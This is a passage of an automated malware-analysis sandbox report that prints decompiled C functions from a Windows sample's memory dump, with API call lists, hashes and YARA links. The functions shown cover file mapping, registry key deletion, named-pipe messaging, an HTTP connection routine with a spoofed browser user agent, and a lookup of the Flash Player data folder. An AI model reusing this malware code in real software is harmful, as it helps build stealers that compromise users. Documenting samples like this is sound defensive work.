        • Instruction Fuzzy Hash: 9251C171A046497ACF319BA48C807FFBB72DB02304F5440BBD891772C6D63D99868F69
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004127C5, Relevance: 9.1, APIs: 6, Instructions: 124fileCOMMON
        Download Yara Rule
        C-Code - Quality: 78%
        			E004127C5(void** __esi, WCHAR* _a4) {
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v33;
				void _v36;
				long _v40;
				char _v41;
				void* _t38;
				int _t50;
				int _t51;
				signed int _t53;
				int _t54;
				int _t57;
				signed int _t60;
				signed int _t61;
				struct _OVERLAPPED* _t65;
				struct _OVERLAPPED* _t69;
				void** _t72;

				_t72 = __esi;
				_push(_t60);
				_t69 = 0;
				_v33 = 0;
				_t38 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 2, 0);
				_t61 = _t60 | 0xffffffff;
				 *__esi = _t38;
				if(_t38 != _t61) {
					_push( &_v12);
					_push(_t38);
					if( *0x414d7c() == 0) {
						_v28 = _t61;
						_v24 = _t61;
					} else {
						_v28 = _v20;
						_v24 = _v16;
					}
					if((_v28 & _v24) == _t61) {
						L7:
						CloseHandle( *_t72);
						 *_t72 =  *_t72 | 0xffffffff;
					} else {
						if((_v28 | _v24) == 0) {
							L21:
							_t72[2] = _t72[2] | 0xffffffff;
							_t34 =  &(_t72[3]);
							 *_t34 = _t72[3] | 0xffffffff;
							__eflags =  *_t34;
							_v41 = 1;
							E00410043( *_t72, _t69, _t69, _t69);
						} else {
							_v20 = _t69;
							_v16 = _t69;
							if(ReadFile( *_t72,  &_v36, 5,  &_v40, _t69) != 0) {
								while(1) {
									__eflags = _v40 - _t69;
									if(_v40 == _t69) {
										goto L21;
									}
									__eflags = _v40 - 5;
									if(_v40 != 5) {
										L19:
										_t50 = E00410043( *_t72, _v20, _v16, _t69);
										__eflags = _t50;
										if(_t50 == 0) {
											goto L7;
										} else {
											_t51 = SetEndOfFile( *_t72);
											__eflags = _t51;
											if(_t51 == 0) {
												goto L7;
											} else {
												goto L21;
											}
										}
									} else {
										_t53 = _v36 ^ _t72[4];
										asm("adc edi, [esp+0x24]");
										_t65 = _t53 + _v20 + 5;
										asm("adc edi, ecx");
										_v36 = _t53;
										__eflags = 0 - _v24;
										if(__eflags > 0) {
											L18:
											_t69 = 0;
											__eflags = 0;
											goto L19;
										} else {
											if(__eflags < 0) {
												L14:
												__eflags = _t53 - 0xa00000;
												if(_t53 > 0xa00000) {
													goto L18;
												} else {
													_t54 = E00410043( *_t72, _t53, 0, 1);
													__eflags = _t54;
													if(_t54 == 0) {
														goto L7;
													} else {
														_v20 = _t65;
														_v16 = 0;
														_t57 = ReadFile( *_t72,  &_v36, 5,  &_v40, 0);
														__eflags = _t57;
														if(_t57 != 0) {
															_t69 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L7;
														}
													}
												}
											} else {
												__eflags = _t65 - _v28;
												if(_t65 > _v28) {
													goto L18;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L22;
								}
								goto L21;
							} else {
								goto L7;
							}
						}
					}
				}
				L22:
				return _v33;
			}























        0x004127c5
        0x004127ce
        0x004127d0
        0x004127e2
        0x004127e7
        0x004127ed
        0x004127f0
        0x004127f4
        0x004127fe
        0x004127ff
        0x00412808
        0x0041281c
        0x00412820
        0x0041280a
        0x0041280e
        0x00412816
        0x00412816
        0x0041282e
        0x0041285f
        0x00412861
        0x00412867
        0x00412830
        0x00412838
        0x00412915
        0x00412915
        0x00412919
        0x00412919
        0x00412919
        0x00412922
        0x00412927
        0x0041283e
        0x0041284d
        0x00412851
        0x0041285d
        0x00412871
        0x00412871
        0x00412875
        0x00000000
        0x00000000
        0x0041287b
        0x00412880
        0x004128ed
        0x004128f8
        0x004128fd
        0x004128ff
        0x00000000
        0x00412905
        0x00412907
        0x0041290d
        0x0041290f
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0041290f
        0x00412882
        0x00412886
        0x00412893
        0x00412897
        0x0041289a
        0x0041289c
        0x004128a0
        0x004128a4
        0x004128eb
        0x004128eb
        0x004128eb
        0x00000000
        0x004128a6
        0x004128a6
        0x004128ae
        0x004128ae
        0x004128b3
        0x00000000
        0x004128b5
        0x004128bb
        0x004128c0
        0x004128c2
        0x00000000
        0x004128c4
        0x004128d4
        0x004128d8
        0x004128dc
        0x004128e2
        0x004128e4
        0x0041286f
        0x0041286f
        0x00000000
        0x004128e6
        0x00000000
        0x004128e6
        0x004128e4
        0x004128c2
        0x004128a8
        0x004128a8
        0x004128ac
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x004128ac
        0x004128a6
        0x004128a4
        0x00000000
        0x00412880
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0041285d
        0x00412838
        0x0041282e
        0x0041292c
        0x00412935

        APIs
        • CreateFileW.KERNEL32 ref: 004127E7
        • GetFileSizeEx.KERNEL32(00000000,C0000000), ref: 00412800
        • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000), ref: 00412855
        • CloseHandle.KERNEL32(?), ref: 00412861
        • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000,?,?,00000000,00000001), ref: 004128DC
        • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00412907
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Read$CloseCreateHandleSize
        • String ID:
        • API String ID: 1850650832-0
        • Opcode ID: 9249fe289495d6ebc675f2f804e2b46492dc134a356bc702e28490dd9a390dc6
        • Instruction ID: 01bca9d1ccbe2c9fe2209116541275a3dc87b9888d3f3a67002a69a07841b2ef
        • Opcode Fuzzy Hash: 9249fe289495d6ebc675f2f804e2b46492dc134a356bc702e28490dd9a390dc6
        • Instruction Fuzzy Hash: 6C419A30108341AFD720DF25DD84AABBBE4FB89314F144A2EF0E4D22A0C3B4D995CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040FF5C, Relevance: 9.1, APIs: 6, Instructions: 81fileCOMMON
        Download Yara Rule
        C-Code - Quality: 42%
        			E0040FF5C(signed int __eax, void* __ecx, void** __esi, WCHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* _t29;
				void* _t30;
				void* _t33;
				signed int _t34;
				void* _t37;
				void* _t38;
				signed int _t41;
				signed int _t43;

				_t52 = __esi;
				_t41 = __eax;
				asm("sbb eax, eax");
				_t29 = CreateFileW(_a4, (__eax | 0xfffffffe) << 0x1e,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t29;
				if(_t29 == 0xffffffff) {
					L10:
					_t30 = 0;
					__eflags = 0;
				} else {
					_push( &_v12);
					_push(_t29);
					if( *0x414d7c() == 0 || _v8 != 0) {
						L9:
						CloseHandle(_t52[2]);
						goto L10;
					} else {
						_t33 = _v12;
						__esi[1] = _t33;
						if(_t33 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_t34 = 0;
							_t43 = _t41 & 0x00000001;
							_t37 = CreateFileMappingW(__esi[2], 0, (_t34 & 0xffffff00 | __eflags != 0x00000000) + (_t34 & 0xffffff00 | __eflags != 0x00000000) + 2, ??, ??, ??);
							__esi[3] = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								goto L9;
							} else {
								__eflags = _t43;
								_t38 = MapViewOfFile(_t37, (_t43 == 0) + (_t43 == 0) + 2, 0, 0, 0);
								 *__esi = _t38;
								__eflags = _t38;
								if(_t38 != 0) {
									goto L5;
								} else {
									CloseHandle(__esi[3]);
									goto L9;
								}
							}
						} else {
							__esi[3] = 0;
							 *__esi = 0;
							L5:
							_t30 = 1;
						}
					}
				}
				return _t30;
			}













        0x0040ff5c
        0x0040ff62
        0x0040ff70
        0x0040ff88
        0x0040ff8e
        0x0040ff94
        0x0041000d
        0x0041000d
        0x0041000d
        0x0040ff96
        0x0040ff99
        0x0040ff9a
        0x0040ffa3
        0x00410004
        0x00410007
        0x00000000
        0x0040ffaa
        0x0040ffaa
        0x0040ffad
        0x0040ffb2
        0x0040ffbd
        0x0040ffbe
        0x0040ffbf
        0x0040ffc2
        0x0040ffc3
        0x0040ffd2
        0x0040ffd8
        0x0040ffdb
        0x0040ffdd
        0x00000000
        0x0040ffdf
        0x0040ffe1
        0x0040ffef
        0x0040fff5
        0x0040fff7
        0x0040fff9
        0x00000000
        0x0040fffb
        0x0040fffe
        0x00000000
        0x0040fffe
        0x0040fff9
        0x0040ffb4
        0x0040ffb4
        0x0040ffb7
        0x0040ffb9
        0x0040ffb9
        0x0040ffb9
        0x0040ffb2
        0x0040ffa3
        0x00410012

        APIs
        • CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00417FD6,?,?,?,004041FB,00414540,?,00000006), ref: 0040FF88
        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FF9B
        • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000), ref: 0040FFD2
        • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FFEF
        • CloseHandle.KERNEL32(?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FFFE
        • CloseHandle.KERNEL32(?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 00410007
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$CloseCreateHandle$MappingSizeView
        • String ID:
        • API String ID: 2246244431-0
        • Opcode ID: 5bd861fa9add532afefc2ffb569e3553e8c3a2124667b3612ee4729e2e9fa6c8
        • Instruction ID: b7221dff55158552bd5e971fd7d158924363d1b764eef9b189cc8c7810b409c6
        • Opcode Fuzzy Hash: 5bd861fa9add532afefc2ffb569e3553e8c3a2124667b3612ee4729e2e9fa6c8
        • Instruction Fuzzy Hash: 6D21C3B5100601BFCB204B66EC4DDABBFFCEBD97507108A3EF052C22A0E6759981CA24
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B712, Relevance: 9.0, APIs: 6, Instructions: 31threadsleepCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040B712() {
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t14;

				SetThreadPriority(GetCurrentThread(), 2);
				_t7 =  *0x414ad4; // 0x241f5a8
				SHDeleteKeyA(0x80000001,  *(_t7 + 0x48));
				_t9 =  *0x414ad4; // 0x241f5a8
				SHDeleteKeyA(0x80000002,  *(_t9 + 0x48));
				_t11 =  *0x414ad4; // 0x241f5a8
				SHDeleteKeyA(0x80000002,  *(_t11 + 0x4c));
				Sleep(0x3e8);
				_t14 =  *0x414ad4; // 0x241f5a8
				return E0040AA33(0,  *((intOrPtr*)(_t14 + 0x2c)), 0xe, 0, 0, 0, 0);
			}







        0x0040b71c
        0x0040b722
        0x0040b72f
        0x0040b735
        0x0040b743
        0x0040b749
        0x0040b752
        0x0040b75d
        0x0040b769
        0x0040b779

        APIs
        • GetCurrentThread.KERNEL32 ref: 0040B715
        • SetThreadPriority.KERNEL32(00000000,?,0040859C), ref: 0040B71C
        • SHDeleteKeyA.SHLWAPI(80000001,?,?,0040859C), ref: 0040B72F
        • SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B743
        • SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B752
        • Sleep.KERNEL32(000003E8,?,0040859C), ref: 0040B75D
          • Part of subcall function 0040AA33: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
          • Part of subcall function 0040AA33: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$DeleteWrite$ReadThread$CreateCurrentHandleNamedPipePrioritySleepState
        • String ID:
        • API String ID: 2160410962-0
        • Opcode ID: 6f66d1e95d5aa60d4e1613b786ecdc00d86ce19ad1576aed66f780645dc72c1b
        • Instruction ID: 454c356d8e9268c3eac19626cd04da9b303d97c2f0f1bfc0c7748119974f95fa
        • Opcode Fuzzy Hash: 6f66d1e95d5aa60d4e1613b786ecdc00d86ce19ad1576aed66f780645dc72c1b
        • Instruction Fuzzy Hash: CDF0DA72151210BFE7415FE5FD09EDA3B68FF88311B028070FA09D61B1DAB18860CB69
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404C58, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81stringCOMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E00404C58(void* __eax, void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _v16;
				void* __ebx;
				void* __edi;
				intOrPtr _t23;
				intOrPtr _t27;
				WCHAR* _t34;
				intOrPtr _t36;
				WCHAR** _t37;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t45;
				signed int _t46;
				signed int _t48;
				signed int _t51;
				intOrPtr _t57;
				void* _t60;

				_v12 = 0;
				_t23 = E0040A332(__eax,  &_v12, __ecx + __eax, 0, 0x64);
				_v8 = _t23;
				if(_t23 != 0) {
					 *0x414ed8("pVirtualKeyExA");
					_t48 = 0;
					if(_v8 > 0) {
						do {
							_t34 = E0040F5EA(_v12 | 0xffffffff,  *((intOrPtr*)(_v12 + _t48 * 4)));
							_v16 = _t34;
							if(_t34 != 0) {
								_t51 = 0;
								_t57 =  *0x414778; // 0x74537972
								if(_t57 > 0) {
									do {
										_t36 =  *0x41477c; // 0x676e6972
										_t37 = _t36 + _t51 * 4;
										if( *_t37 != 0 && lstrcmpiW( *_t37, _v16) == 0) {
											_t39 =  *0x41477c; // 0x676e6972
											E0040F15E( *((intOrPtr*)(_t39 + _t51 * 4)));
											_t41 =  *0x41477c; // 0x676e6972
											 *((intOrPtr*)(_t41 + _t51 * 4)) = 0;
										}
										_t51 = _t51 + 1;
										_t60 = _t51 -  *0x414778; // 0x74537972
									} while (_t60 < 0);
								}
								E0040F15E(_v16);
							}
							_t48 = _t48 + 1;
						} while (_t48 < _v8);
					}
					_t27 =  *0x414778; // 0x74537972
					_t45 =  *0x41477c; // 0x676e6972
					_t46 = 0;
					if(_t27 > 0) {
						while( *((intOrPtr*)(_t45 + _t46 * 4)) == 0) {
							_t46 = _t46 + 1;
							if(_t46 < _t27) {
								continue;
							}
							goto L15;
						}
					}
					L15:
					if(_t46 == _t27) {
						 *0x414778 = 0;
						E0040F15E(_t45);
					}
					 *0x414edc("pVirtualKeyExA");
					E0040F17A(_v8, _v12);
				}
				E004047F5(0);
				return 0;
			}





















        0x00404c6b
        0x00404c6e
        0x00404c73
        0x00404c78
        0x00404c83
        0x00404c89
        0x00404c8e
        0x00404c91
        0x00404c9a
        0x00404c9f
        0x00404ca4
        0x00404ca6
        0x00404ca8
        0x00404cae
        0x00404cb0
        0x00404cb0
        0x00404cb5
        0x00404cba
        0x00404ccb
        0x00404cd3
        0x00404cd8
        0x00404cdd
        0x00404cdd
        0x00404ce0
        0x00404ce1
        0x00404ce1
        0x00404cb0
        0x00404cec
        0x00404cec
        0x00404cf1
        0x00404cf2
        0x00404cf7
        0x00404cf8
        0x00404cfd
        0x00404d03
        0x00404d07
        0x00404d09
        0x00404d0e
        0x00404d11
        0x00000000
        0x00000000
        0x00000000
        0x00404d11
        0x00404d09
        0x00404d13
        0x00404d15
        0x00404d18
        0x00404d1e
        0x00404d1e
        0x00404d28
        0x00404d34
        0x00404d34
        0x00404d39
        0x00404d43

        APIs
        • RtlEnterCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404C83
        • lstrcmpiW.KERNEL32(676E6972,?,?,?,?,00000000,00000064), ref: 00404CC1
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • RtlLeaveCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404D28
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterFreeHeapLeavelstrcmpi
        • String ID: pVirtualKeyExA$ryStringW
        • API String ID: 2749521334-3252542104
        • Opcode ID: d3ef7adb61e24ed7707c8531e60ec3c0f98204fb0eba40159b854a4407d72b7f
        • Instruction ID: 53ff5075365b2bc4a22c2f581c7cfbd323e15892a5cdcda01cfa3ee234b1d21f
        • Opcode Fuzzy Hash: d3ef7adb61e24ed7707c8531e60ec3c0f98204fb0eba40159b854a4407d72b7f
        • Instruction Fuzzy Hash: 3B2191B1900214EFDB20AFB5ED8589D77B5FBC9301712807AE621B72E1CB389D429B58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040642E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 77%
        			E0040642E(void* __ecx, void* __edi, intOrPtr _a4) {
				long _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				void* _t15;
				void* _t31;
				void* _t37;

				_t37 = __edi;
				if(__edi <= 0x3e8) {
					 *0x414ed8(0x4147a4);
					_v8 = GetTickCount();
					_t10 =  *0x4147bc; // 0x7373654d
					if(_t10 != 0 && _v8 - _t10 > 0xea60) {
						E004063F9();
					}
					_t12 = ( *0x4147a0 & 0x0000ffff) + _t37;
					if(( *0x4147a0 & 0x0000ffff) + _t37 <= 0x3e8) {
						_t13 = E0040F117(_t12,  *0x4147c4);
						if(_t13 != 0) {
							 *0x4147c4 = _t13;
							E0040F19A(( *0x4147a0 & 0x0000ffff) + _t13, _a4, _t37);
							 *0x4147a0 =  *0x4147a0 + _t37;
						}
					} else {
						_t31 = RtlAllocateHeap( *0x415fa8, 8, 0x3ec);
						if(_t31 != 0) {
							E0040F19A(_t17 - _t37 + 0x3e8, _a4, _t37);
							E0040F19A(_t31, ( *0x4147a0 & 0x0000ffff) +  *0x4147c4 + _t37 - 0x3e8, 0x3e8 - _t37);
							E0040F15E( *0x4147c4);
							 *0x4147c4 = _t31;
							 *0x4147a0 = 0x3e8;
						}
					}
					 *0x4147bc = _v8;
					_t15 =  *0x414edc(0x4147a4);
				} else {
					_t15 = E004063F9();
				}
				return _t15;
			}









        0x0040642e
        0x0040643a
        0x0040644b
        0x00406457
        0x0040645a
        0x00406461
        0x00406470
        0x00406470
        0x0040647c
        0x00406481
        0x004064ea
        0x004064f1
        0x00406501
        0x00406506
        0x0040650b
        0x0040650b
        0x00406483
        0x00406496
        0x0040649a
        0x004064a5
        0x004064c5
        0x004064d0
        0x004064d5
        0x004064db
        0x004064db
        0x0040649a
        0x0040651a
        0x0040651f
        0x0040643c
        0x0040643c
        0x0040643c
        0x00406528

        APIs
        • RtlEnterCriticalSection.NTDLL(004147A4), ref: 0040644B
        • GetTickCount.KERNEL32 ref: 00406451
        • RtlAllocateHeap.NTDLL(00000008,000003EC), ref: 00406490
        • RtlLeaveCriticalSection.NTDLL(004147A4), ref: 0040651F
          • Part of subcall function 004063F9: RtlEnterCriticalSection.NTDLL(004147A4), ref: 00406400
          • Part of subcall function 004063F9: RtlLeaveCriticalSection.NTDLL(004147A4), ref: 00406426
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave$AllocateCountHeapTick
        • String ID: MessageW
        • API String ID: 2032597661-511154193
        • Opcode ID: 8ce53716e63ef59e52f3b59414a18f402464df3b1a4a3fe9836199a74e15210f
        • Instruction ID: 71d7fef707f7e118032529ae5f8b316327552308b24b78040d7661cbec0e1816
        • Opcode Fuzzy Hash: 8ce53716e63ef59e52f3b59414a18f402464df3b1a4a3fe9836199a74e15210f
        • Instruction Fuzzy Hash: EE21C271600241EFC720AF65ED459AE3AA8FBC5704B15813FB41AE62E1DB788D50DB5C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004047F5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
        Download Yara Rule
        C-Code - Quality: 72%
        			E004047F5(void* __ebx) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __esi;
				signed int _t18;
				intOrPtr _t27;
				void* _t29;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t39;
				signed int _t40;
				void* _t42;
				void* _t47;

				_t40 = 0;
				_t37 = 0;
				_v8 = 0;
				 *0x414ed8("pVirtualKeyExA");
				_t18 = 0;
				_v16 = 0;
				_t42 =  *0x414778 - _t37; // 0x74537972
				if(_t42 <= 0) {
					L9:
					 *0x414edc("pVirtualKeyExA");
					E00408A2F(_t37, _t47, 0, "PopOpO03-3331111", _t40);
					return E0040F15E(_t40);
				}
				do {
					_t35 =  *0x41477c; // 0x676e6972
					_t23 = _t35 + _t18 * 4;
					if( *(_t35 + _t18 * 4) != 0) {
						_t36 = E0040F583(_t23 | 0xffffffff,  *_t23);
						_v12 = _t36;
						if(_t36 != 0) {
							_t27 = E0040F637(_t36);
							_t34 = _t27 + _t37;
							_v20 = _t27;
							_t29 = E0040F0F6(_t34 + 1,  &_v8);
							_t40 = _v8;
							if(_t29 != 0) {
								E0040F19A(_t37 + _t40, _v12, _v20);
								_t39 = _t34;
								 *((char*)(_t39 + _t40)) = 0x20;
								_t37 = _t39 + 1;
							}
							E0040F15E(_v12);
						}
					}
					_t18 = _v16 + 1;
					_v16 = _t18;
					_t47 = _t18 -  *0x414778; // 0x74537972
				} while (_t47 < 0);
				goto L9;
			}



















        0x004047fd
        0x00404804
        0x00404806
        0x00404809
        0x0040480f
        0x00404811
        0x00404814
        0x0040481a
        0x00404888
        0x0040488d
        0x0040489d
        0x004048ab
        0x004048ab
        0x0040481d
        0x0040481d
        0x00404823
        0x00404829
        0x00404835
        0x00404837
        0x0040483c
        0x0040483e
        0x00404843
        0x00404846
        0x0040484f
        0x00404854
        0x00404859
        0x00404864
        0x00404869
        0x0040486b
        0x0040486f
        0x0040486f
        0x00404873
        0x00404873
        0x0040483c
        0x0040487b
        0x0040487c
        0x0040487f
        0x0040487f
        0x00000000

        APIs
        • RtlEnterCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404809
        • RtlLeaveCriticalSection.NTDLL(pVirtualKeyExA), ref: 0040488D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: PopOpO03-3331111$pVirtualKeyExA$ryStringW
        • API String ID: 3168844106-3132647893
        • Opcode ID: 856897508dc3eb2d2dd6a5f740af23b6c0af515f567466c0ad20695f6def1a54
        • Instruction ID: 66ed406b861a50cb862cc8a16632bad892fe40656053a47b74d21d0a40110743
        • Opcode Fuzzy Hash: 856897508dc3eb2d2dd6a5f740af23b6c0af515f567466c0ad20695f6def1a54
        • Instruction Fuzzy Hash: 8A11DF72900244EFCB21BF6ACC45ADE7BB5FF85714B11847AE024B72D1C7399A46CB98
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040FA6D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040FA6D(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t17;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t17 = 0;
				do {
					_t1 = _t17 + 0x41400c; // 0x41400c
					_t2 = _t17 +  &E00414008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t17 = _t17 + 8;
				} while (_t17 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}










        0x0040fa6d
        0x0040fa6d
        0x0040fa73
        0x0040fa75
        0x0040fa75
        0x0040fa8a
        0x0040fa8e
        0x0040fad2
        0x00000000
        0x0040fad2
        0x0040fa91
        0x0040fa93
        0x0040fa95
        0x0040fa9c
        0x0040faa3
        0x0040faa9
        0x0040faac
        0x0040fac0
        0x0040fac9
        0x0040facc
        0x00000000
        0x0040facc
        0x0040fad6

        APIs
        • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040FA84
        • InternetSetOptionA.WININET(00000000,00000002,0041400C,00000004), ref: 0040FAA3
        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040FAC0
        • InternetCloseHandle.WININET(00000000), ref: 0040FACC
        Strings
        • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0040FA75, 0040FA83
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Internet$CloseConnectHandleOpenOption
        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
        • API String ID: 910987326-2068255511
        • Opcode ID: 9fb399d4ba70c751e7fda5396c7e59361f6489e9cb7e102260a246b0c1febed7
        • Instruction ID: 44ee639f3f4135d01c397f351ea4cacc153b05c21a8fd8268a4f44a556464a15
        • Opcode Fuzzy Hash: 9fb399d4ba70c751e7fda5396c7e59361f6489e9cb7e102260a246b0c1febed7
        • Instruction Fuzzy Hash: AFF0C2723412207BDB3147A29C88EEBBE5DEF893E47014432F21AE1860C234891087BC
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040FE74, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 54%
        			E0040FE74() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E0040F346( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}










        0x0040fe83
        0x0040fe85
        0x0040fe8b
        0x0040fe90
        0x0040fe98
        0x0040fea0
        0x0040fea6
        0x0040fead
        0x0040feb3
        0x0040feb4
        0x0040feb7
        0x0040fec1
        0x0040fec6
        0x0040fec8
        0x0040fec8
        0x0040fece
        0x0040fee4
        0x0040fee4
        0x0040fee6
        0x0040feea
        0x0040feea
        0x0040fef4

        APIs
        • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040FE85
        • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040FE98
        • FreeLibrary.KERNEL32(?), ref: 0040FEEA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: ObtainUserAgentString$urlmon.dll
        • API String ID: 145871493-2685262326
        • Opcode ID: 6834644476a239007017ea1b47c5a167766a8d7ab6b36973dd9f3fdc70fd1ab2
        • Instruction ID: 7196f1a1a81746876e2f75059bb60244ad8aa23d00c64408a657e722c573b090
        • Opcode Fuzzy Hash: 6834644476a239007017ea1b47c5a167766a8d7ab6b36973dd9f3fdc70fd1ab2
        • Instruction Fuzzy Hash: CD01ACB1900114ABCB20DBE4ED845DE7BB8AB44300F2045BBB755F32D1DA345E488768
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004053C0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E004053C0(intOrPtr _a4) {
				short _v528;
				void* __edi;
				void* _t8;
				void* _t17;

				_t8 =  *0x414b58(0,  &_v528, 0x1a, 0);
				if(_t8 != 0) {
					PathCombineW( &_v528,  &_v528, L"Macromedia\\Flash Player");
